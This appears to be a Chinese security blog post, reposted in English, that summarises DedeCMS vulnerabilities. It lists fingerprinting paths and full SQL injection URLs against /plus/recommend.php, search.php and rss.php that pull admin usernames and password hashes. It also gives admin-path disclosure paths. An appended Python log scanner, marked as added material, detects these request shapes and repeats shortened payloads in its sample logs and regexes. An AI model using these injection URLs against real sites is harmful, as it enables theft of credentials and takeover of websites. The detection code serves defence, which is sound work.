
DedeCMS vulnerability summary

1. Determine the last upgrade time: /data/admin/ver.txt

2. Determine the version: /plus/guestbook.php, check the copyright notice at the bottom of the page.

3. Confirm that the site is really DedeCMS: data/admin/allowurl.txt

4. Determine the admin backend path: /data/mysql_error_trace.inc

Vulnerability 1: SQL injection in /plus/recommend.php

/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=’ or mid=@`’` union select 1,2,3,(select concat(0x7c,userid,0x7c,pwd) from `%23@__admin` limit 0,1),5,6,7,8,9%23@`’`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type]=11

By changing the limit parameter you can walk through the admin accounts and password hashes; changing the table name from admin to member returns the front-end member accounts and password hashes instead.

Vulnerability 2: SQL injection in plus/search.php

PoC test: /plus/search.php?keyword=as&typeArr[uNion]%20=a

If the response is: Safe Alert: Request Error step 1!

/plus/search.php?keyword=as&typeArr[111%3D@`’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`’`+]=a

If the response is: Safe Alert: Request Error step 2!

/plus/search.php?keyword=as&typeArr[111%3D@`’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`’`+]=a

Vulnerability 3: Admin backend path disclosure

On old versions, requesting the following paths may redirect straight to the admin login page; version 5.7 usually asks you to enter the admin path before redirecting.

include/dialog/select_images.php
include/dialog/select_soft.php
include/dialog/config.php
include/dialog/select_soft.php?activepath=/include/FCKeditor
include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p

/tags.php can also be used for brute forcing, with the following Python script: dedecms

Vulnerability 4: DedeCMS 5.6 RSS SQL injection

plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND “‘” AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#’][0]=1

Summary of other old-version vulnerabilities: https://blog.csdn.net/gmnet/article/details/7304743

Vulnerability 5: Front-end arbitrary user password reset

Requires the member module to be enabled.

https://www.cnblogs.com/v1vvwv/p/DEDECMS_Vulnerability_Summary.html
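As an added defensive example that is not part of the original post or of DedeCMS itself, the following Python script scans web-server access-log lines for the request shapes shown under vulnerabilities 1, 2 and 4 above (the _FILES smuggling in recommend.php, SQL keywords inside a typeArr[] key of search.php, and inside a _Cs[] key of rss.php) and for requests to the fingerprinting and dialog paths listed at the top of the post. The log lines, IP addresses, rule names and path list are constructed assumptions for illustration; the script decodes each query string once and lower-cases it so that the case-mixed keywords used in the PoCs are still matched.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format). Not real traffic:
# the query strings are shortened forms of the request shapes described on this
# page, URL-encoded the way a client would send them.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 8 "-" "curl/7.88"
203.0.113.10 - - [10/Oct/2023:13:55:37 +0800] "GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%27%20or%20mid=@%60%27%60%20union%20select%201,2,3&_FILES[type][name]=1.jpg HTTP/1.1" 200 512 "-" "curl/7.88"
203.0.113.10 - - [10/Oct/2023:13:55:38 +0800] "GET /plus/search.php?keyword=as&typeArr[uNion]%20=a HTTP/1.1" 200 300 "-" "curl/7.88"
203.0.113.10 - - [10/Oct/2023:13:55:39 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%201),1)%23][0]=1 HTTP/1.1" 200 120 "-" "curl/7.88"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0800] "GET /plus/search.php?keyword=dedecms&typeArr[1]=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:05 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip, ident, user, [timestamp], "METHOD url proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths from the fingerprinting and admin-path sections of the post. A request
# for one of these is not an attack by itself, but it is worth flagging as a probe.
FINGERPRINT_PATHS = {
    "/data/admin/ver.txt",
    "/data/admin/allowurl.txt",
    "/data/mysql_error_trace.inc",
    "/include/dialog/select_images.php",
    "/include/dialog/select_soft.php",
    "/include/dialog/config.php",
}

# (rule name, path pattern, decoded-and-lowercased query pattern). Rule names are
# assumptions chosen for this example.
RULES = [
    # Vulnerability 1: a $_FILES-shaped array arriving in the query string of recommend.php
    ("recommend_files_injection", r"^/plus/recommend\.php$",
     r"_files\[[^\]]*\]\[tmp_name\]"),
    # Vulnerability 2: SQL keywords inside the *key* of typeArr[] on search.php
    ("search_typearr_injection", r"^/plus/search\.php$",
     r"typearr\[[^\]]*?\b(union|select|and|or)\b"),
    # Vulnerability 4: SQL keywords inside the key of _Cs[] on rss.php
    ("rss_cs_injection", r"^/plus/rss\.php$",
     r"_cs\[[^\]]*?\b(union|select|and|updatexml)\b"),
    # Catch-all for the SQL constructs used by the PoCs, whatever the script
    ("generic_sqli", r".",
     r"union\s+select|updatexml\s*\(|extractvalue\s*\(|information_schema"),
]
RULES = [(name, re.compile(p), re.compile(q)) for name, p, q in RULES]


def normalize(url):
    """Split path from query, decode once ('+' and %XX) and lower-case both parts.
    Lower-casing neutralises keyword case-mixing such as 'UnIon' or 'seleCt'."""
    path, _, query = url.partition("?")
    return unquote_plus(path).lower(), unquote_plus(query).lower()


def classify_request(url):
    """Return the list of rule names a single request URL triggers (empty if clean)."""
    path, query = normalize(url)
    hits = []
    if path in FINGERPRINT_PATHS:
        hits.append("fingerprint_probe")
    for name, path_re, query_re in RULES:
        if path_re.search(path) and query_re.search(query):
            hits.append(name)
    return hits


def parse_log_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Scan a block of log text; return one finding per request that triggers a rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        hits = classify_request(rec["url"])
        if hits:
            findings.append({"ip": rec["ip"], "path": rec["url"].partition("?")[0],
                             "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:<15} {f['path']:<32} {', '.join(f['rules'])}")
```

Two properties of the matching are deliberate: the rules key on the decoded query rather than the raw one, because every PoC above relies on encoding (%23, %3D, mixed case) to slip past naive string checks; and the typeArr/_Cs rules look inside the array key, not the value, because that is where those two injections put their payload. A single decode pass is used here; if your server decodes twice, run the query through unquote_plus twice before matching.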


Please credit the source when reprinting: 天天小站 » DedeCMS vulnerability summary
